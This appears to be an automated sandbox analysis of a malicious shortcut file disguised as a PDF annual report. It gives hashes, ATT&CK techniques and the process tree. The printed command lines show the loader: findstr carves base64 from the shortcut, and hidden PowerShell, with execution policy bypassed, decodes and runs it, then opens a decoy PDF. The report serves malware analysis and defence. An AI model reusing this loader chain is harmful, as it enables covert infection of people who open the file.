ec01c971910cefaf107cd44a7d4c7e68d6e1659ee24c60340c505511d37104b3

General

Target

2023_Annual_Report.pdf.lnk
Size

55KB
MD5

bbc4414d76d1a765f3d525556f616ef9
SHA1

c73e28d87fbbc8be79ed1d421e78a41c29111a86
SHA256

86f504dea07fd952253904c468d83d9014a290e1ff5f2d103059638e07d14b09
SHA512

2a7204e361ace1c5c03bc240b985d09cc1f1e67dce025dca5ac9d450bc7193e456d3602ab557abd9bd7ec4d96815e41df06cdce9359379b32c0e777aa9d54be7
SSDEEP

768:NLoFJQeDHeGYyhA5Z7JsCVResXebqwVCYm7/k/m7RU6d/dwiuGIjsZL2RxcNRyxc:NLBWYX5Z7JsCVCbqECB7cOm0OoxUURV

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 64 IoCs

Processes:

powershell.exe

flow	pid	process
2	3948	powershell.exe
3	3948	powershell.exe
6	3948	powershell.exe
8	3948	powershell.exe
9	3948	powershell.exe
15	3948	powershell.exe
23	3948	powershell.exe
24	3948	powershell.exe
25	3948	powershell.exe
26	3948	powershell.exe
27	3948	powershell.exe
28	3948	powershell.exe
29	3948	powershell.exe
30	3948	powershell.exe
31	3948	powershell.exe
32	3948	powershell.exe
33	3948	powershell.exe
34	3948	powershell.exe
35	3948	powershell.exe
36	3948	powershell.exe
37	3948	powershell.exe
40	3948	powershell.exe
42	3948	powershell.exe
43	3948	powershell.exe
44	3948	powershell.exe
45	3948	powershell.exe
48	3948	powershell.exe
50	3948	powershell.exe
51	3948	powershell.exe
52	3948	powershell.exe
53	3948	powershell.exe
54	3948	powershell.exe
55	3948	powershell.exe
56	3948	powershell.exe
57	3948	powershell.exe
58	3948	powershell.exe
63	3948	powershell.exe
64	3948	powershell.exe
65	3948	powershell.exe
66	3948	powershell.exe
67	3948	powershell.exe
68	3948	powershell.exe
69	3948	powershell.exe
70	3948	powershell.exe
71	3948	powershell.exe
72	3948	powershell.exe
73	3948	powershell.exe
74	3948	powershell.exe
75	3948	powershell.exe
76	3948	powershell.exe
77	3948	powershell.exe
78	3948	powershell.exe
79	3948	powershell.exe
80	3948	powershell.exe
81	3948	powershell.exe
82	3948	powershell.exe
83	3948	powershell.exe
84	3948	powershell.exe
85	3948	powershell.exe
86	3948	powershell.exe
87	3948	powershell.exe
88	3948	powershell.exe
89	3948	powershell.exe
90	3948	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4068299709-2976237847-2753307267-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4068299709-2976237847-2753307267-1000_Classes\Local Settings powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4784 powershell.exe
4784 powershell.exe
4784 powershell.exe
3948 powershell.exe
3948 powershell.exe
3948 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4784 powershell.exe
Token: SeDebugPrivilege 3948 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

96 AcroRd32.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

96 AcroRd32.exe
96 AcroRd32.exe
96 AcroRd32.exe
96 AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4068299709-2976237847-2753307267-1000_Classes\Local Settings	powershell.exe

pid	process
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	3948	powershell.exe

pid	process
96	AcroRd32.exe

pid	process
96	AcroRd32.exe
96	AcroRd32.exe
96	AcroRd32.exe
96	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 3488 wrote to memory of 2168	3488	cmd.exe	cmd.exe
PID 3488 wrote to memory of 2168	3488	cmd.exe	cmd.exe
PID 2168 wrote to memory of 4848	2168	cmd.exe	findstr.exe
PID 2168 wrote to memory of 4848	2168	cmd.exe	findstr.exe
PID 2168 wrote to memory of 4784	2168	cmd.exe	powershell.exe
PID 2168 wrote to memory of 4784	2168	cmd.exe	powershell.exe
PID 4784 wrote to memory of 3948	4784	powershell.exe	powershell.exe
PID 4784 wrote to memory of 3948	4784	powershell.exe	powershell.exe
PID 3948 wrote to memory of 4992	3948	powershell.exe	findstr.exe
PID 3948 wrote to memory of 4992	3948	powershell.exe	findstr.exe
PID 3948 wrote to memory of 3808	3948	powershell.exe	attrib.exe
PID 3948 wrote to memory of 3808	3948	powershell.exe	attrib.exe
PID 3948 wrote to memory of 96	3948	powershell.exe	AcroRd32.exe
PID 3948 wrote to memory of 96	3948	powershell.exe	AcroRd32.exe
PID 3948 wrote to memory of 96	3948	powershell.exe	AcroRd32.exe
PID 96 wrote to memory of 3604	96	AcroRd32.exe	RdrCEF.exe
PID 96 wrote to memory of 3604	96	AcroRd32.exe	RdrCEF.exe
PID 96 wrote to memory of 3604	96	AcroRd32.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4460	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4424	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4424	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4424	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4424	3604	RdrCEF.exe	RdrCEF.exe
PID 3604 wrote to memory of 4424	3604	RdrCEF.exe	RdrCEF.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3808 attrib.exe

pid	process
3808	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\2023_Annual_Report.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "C:\Users\Admin\AppData\Local\Temp\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
2⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\system32\findstr.exe
findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk
3⤵
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /R JVBERi0xLjcNJeLjz9 2023_Annual_Report.pdf.lnk
5⤵
PID:4992

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h C:\Users\Admin\Temp.jpg
5⤵
- Views/modifies file attributes
PID:3808

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Important.pdf"
5⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:96

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
6⤵
- Suspicious use of WriteProcessMemory
PID:3604

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E2ABDC21622FAE450E3A9DA3BE53B6A0 --mojo-platform-channel-handle=1628 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4460

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D6A75EA7E3312E18B0132CC79E9BF481 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D6A75EA7E3312E18B0132CC79E9BF481 --renderer-client-id=2 --mojo-platform-channel-handle=1640 --allow-no-sandbox-job /prefetch:1
7⤵
PID:4424

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1A4C7E2D523F686E0D4BC1F985684A82 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1A4C7E2D523F686E0D4BC1F985684A82 --renderer-client-id=4 --mojo-platform-channel-handle=2228 --allow-no-sandbox-job /prefetch:1
7⤵
PID:4700

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6A51EA5F48909BEAC04A4C73A85D647B --mojo-platform-channel-handle=2580 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:3004

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EFC99BEB83C0626DD5ADE056806EB997 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4588

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B5B0BF5783BD5D43E418172D1DC87379 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:2204

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
d033eb47abf671571ce06e7a1fe7026f

SHA1
61fcd6cefb0674e23495a4207d02aa5b83a0f43b

SHA256
2d91f179c7d7a06e47f88ad7a47a612290e48df2e839ae66fdb0bd6b3eb534da

SHA512
87a346e122a4fc616e39f78eb50cf03d3bdb064bdb5e26614f155bed7a916f694085337111d398f29f77e2278e90075003022321335274b61d12ae97e7a8436a

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
58714de254c2b521f88d9538b58fb0ea

SHA1
09ddc164f69829211f8e8166296305c9087d6f1b

SHA256
06b1c2846ff24bb9661e8230980c56e0d4d7d35fb7954bb697209e1fb7381903

SHA512
6b856df29596801d02de6ecb4632ebd47f8062efaca6e503c58f6f9b7501b41f081a60bfb7dc6f75688dacac18bd8db2c877b4133615abcae7b3aeb8c6898f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\Important.pdf
Filesize
35KB

MD5
76f18bc1e745e59e37141f2a9d336f6f

SHA1
289c50c79786a9e3ce559e7b6246305c26aa1082

SHA256
84f026998c5a547c8cc3ba8d86d3425097c501ae85a207c121288f6c1cf72710

SHA512
8b7c74ec13e4b8fc6c7cdb6ee161b203f99cf671ff72487bdce12f5d8c1ff73939bb31d6065fc1fcb41caa00ae07d8fab618848ec5f67748899586e498da496f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp.jpg
Filesize
7KB

MD5
50514f94115e319477095fbefa61257e

SHA1
004b3b8e4ace16db6fc954c10decf8856617ef12

SHA256
4339e02a2557b36934baf68b6e97daae04a3e118da2a66915e6200579594d8c6

SHA512
47f6a6f52e02cb7365e70e1637ad0f6e4c96c6f156ad794f3583eb8cbf1dc9af3b8a921ca2c754c2636bba2c2c6991204930502d171b2b41b72af78bfb7e2a49

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0t3cwt1.pu1.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/96-651-0x0000000009290000-0x00000000092B1000-memory.dmp

Filesize
132KB

Download
memory/3948-38-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-661-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-37-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-726-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-66-0x00000225A07A0000-0x00000225A07DC000-memory.dmp

Filesize
240KB

Download
memory/3948-223-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-679-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-636-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-660-0x00000225A0690000-0x00000225A06A0000-memory.dmp

Filesize
64KB

Download
memory/3948-33-0x00007FFE39C50000-0x00007FFE3A63C000-memory.dmp

Filesize
9.9MB

Download
memory/3948-656-0x00007FFE39C50000-0x00007FFE3A63C000-memory.dmp

Filesize
9.9MB

Download
memory/4784-655-0x000001381CAF0000-0x000001381CB00000-memory.dmp

Filesize
64KB

Download
memory/4784-654-0x000001381CAF0000-0x000001381CB00000-memory.dmp

Filesize
64KB

Download
memory/4784-652-0x00007FFE39C50000-0x00007FFE3A63C000-memory.dmp

Filesize
9.9MB

Download
memory/4784-4-0x00000138368E0000-0x0000013836902000-memory.dmp

Filesize
136KB

Download
memory/4784-9-0x000001381CAF0000-0x000001381CB00000-memory.dmp

Filesize
64KB

Download
memory/4784-8-0x000001381CAF0000-0x000001381CB00000-memory.dmp

Filesize
64KB

Download
memory/4784-5-0x00007FFE39C50000-0x00007FFE3A63C000-memory.dmp

Filesize
9.9MB

Download
memory/4784-12-0x0000013836B90000-0x0000013836C06000-memory.dmp

Filesize
472KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads